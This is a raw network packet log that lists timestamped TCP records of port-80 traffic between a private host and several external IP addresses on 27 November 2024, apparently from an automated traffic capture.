                                                                                        Nov 27, 2024 11:29:19.205945015 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.206372976 CET4974880192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:19.209932089 CET4974880192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:19.626429081 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626477003 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626512051 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626540899 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626569033 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626596928 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626626015 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626657963 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:21.726571083 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.144395113 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.144665956 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.147238016 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.564965963 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565191984 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565234900 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565268040 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565356970 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565392017 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565444946 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.565483093 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565517902 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565601110 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565628052 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565649033 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.565696955 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.565989971 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.566653967 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.984592915 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:27.753212929 CET4975080192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:27.941153049 CET804975013.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:27.941376925 CET4975080192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:27.944976091 CET4975080192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:28.132105112 CET804975013.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:28.132637024 CET804975013.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:28.132802963 CET4975080192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:29.458491087 CET4975080192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:29.645185947 CET804975013.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:30.474723101 CET4975180192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:30.662856102 CET804975113.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:30.663096905 CET4975180192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:30.666505098 CET4975180192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:30.853809118 CET804975113.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:30.854269981 CET804975113.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:30.854496956 CET4975180192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:32.176713943 CET4975180192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:32.364259958 CET804975113.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.192856073 CET4975280192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:33.380806923 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.381016970 CET4975280192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:33.384470940 CET4975280192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:33.384531975 CET4975280192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:33.571501017 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.571580887 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.571722031 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.571746111 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.572251081 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:35.911293983 CET4975380192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:36.099826097 CET804975313.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:36.100091934 CET4975380192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:36.102649927 CET4975380192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:36.289769888 CET804975313.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:36.290648937 CET804975313.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:36.290682077 CET804975313.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:36.291018009 CET4975380192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:36.291717052 CET4975380192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:36.478702068 CET804975313.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.554805040 CET4975480192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:41.723474026 CET804975466.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.723717928 CET4975480192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:41.727457047 CET4975480192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:41.896017075 CET804975466.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.915479898 CET804975466.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.915549994 CET804975466.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.915750027 CET4975480192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:43.236747026 CET4975480192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:44.253066063 CET4975580192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:44.421818972 CET804975566.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:44.422112942 CET4975580192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:44.425600052 CET4975580192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:44.594249010 CET804975566.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:44.610393047 CET804975566.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:44.610455036 CET804975566.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:44.610694885 CET4975580192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:45.939295053 CET4975580192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:46.955404997 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:47.124413967 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.124635935 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:47.128191948 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:47.128262997 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:47.297068119 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.297172070 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.297198057 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.297218084 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.297239065 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.297375917 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.315011978 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.315057039 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.315202951 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:48.642790079 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:49.658086061 CET4975780192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:49.826925039 CET804975766.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:49.827138901 CET4975780192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:49.829678059 CET4975780192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:49.998827934 CET804975766.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:50.010843039 CET804975766.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:50.010857105 CET804975766.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:50.011209965 CET4975780192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:50.011873007 CET4975780192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:50.180494070 CET804975766.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.203764915 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:55.375293970 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.375622988 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:55.379116058 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:55.550630093 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.729764938 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.729849100 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.729872942 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.729964972 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730103970 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:55.730106115 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730133057 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730133057 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:55.730154037 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730170012 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730189085 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730307102 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:56.890012980 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:57.906220913 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.078224897 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.078514099 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.082005024 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.253680944 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448162079 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448220968 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448281050 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448364019 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448446989 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448482037 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.448539972 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.448791981 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448884964 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448946953 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.448954105 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448998928 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.449124098 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:59.592530966 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:00.608669043 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:00.780627012 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:00.780857086 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:00.784394979 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:00.784439087 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:00.956042051 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:00.956121922 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:00.956139088 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:00.956399918 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232091904 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232172012 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232429981 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:01.232554913 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232573032 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232672930 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232770920 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:01.232795954 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232815981 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232898951 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.232994080 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:01.233161926 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:01.241381884 CET8049760173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:01.241563082 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:02.295069933 CET4976080192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:03.311197042 CET4976180192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:03.483241081 CET8049761173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:03.483378887 CET4976180192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:03.485831976 CET4976180192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:03.657624006 CET8049761173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:04.013653040 CET8049761173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:04.013943911 CET8049761173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:04.014101982 CET4976180192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:04.014697075 CET4976180192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:30:04.186765909 CET8049761173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.316586971 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:09.647001982 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.647211075 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:09.650625944 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:09.981174946 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.984363079 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.984461069 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.984514952 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.984591007 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.984672070 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.984726906 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.984735966 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.984746933 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.984807014 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:09.984886885 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.984930992 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:09.985342979 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:09.985490084 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.315022945 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315093994 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315113068 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315226078 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315303087 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.315346003 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315376997 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315463066 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.315471888 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315608025 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.315650940 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315717936 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315735102 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315897942 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315901041 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.315928936 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315982103 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.315999031 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.316010952 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.316037893 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.316124916 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.316131115 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.316160917 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.316189051 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.316226006 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.316282988 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.316342115 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.316370964 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.316371918 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.316570044 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.645642042 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.645790100 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.645822048 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.645876884 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.645994902 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646015882 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646032095 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646095991 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.646110058 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646199942 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.646235943 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646249056 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.646265030 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646294117 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646322012 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646397114 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646445036 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.646482944 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646513939 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646552086 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.646614075 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646691084 CET804976243.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:10.646750927 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.646796942 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:10.646850109 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:11.152523041 CET4976280192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:12.168646097 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:12.498837948 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.499003887 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:12.502510071 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:12.832705021 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835210085 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835244894 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835262060 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835274935 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835414886 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:12.835427999 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835501909 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835618019 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835652113 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835669994 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835697889 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:12.835773945 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:12.835794926 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:12.835930109 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.168908119 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.168950081 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.168971062 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169017076 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169125080 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.169156075 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169209003 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.169229031 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169272900 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169294119 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169344902 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169380903 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.169425011 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.169466972 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169533968 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169559002 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169672012 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169677019 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.169704914 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169759035 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169783115 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169811964 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.169914007 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.170034885 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.170042038 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.170062065 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.170084000 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.170249939 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.499551058 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.499664068 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.499685049 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.499749899 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.499891043 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.499921083 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.499952078 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.499968052 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.499979019 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.499994993 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.500010014 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.500025034 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.500163078 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.500163078 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.500205040 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.500231981 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.500247002 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.500294924 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.500315905 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.500437975 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:13.500453949 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.500478983 CET804976343.163.1.110192.168.11.20
                                                                                        Nov 27, 2024 11:30:13.500711918 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:14.011272907 CET4976380192.168.11.2043.163.1.110
                                                                                        Nov 27, 2024 11:30:15.027367115 CET4976480192.168.11.2043.163.1.110
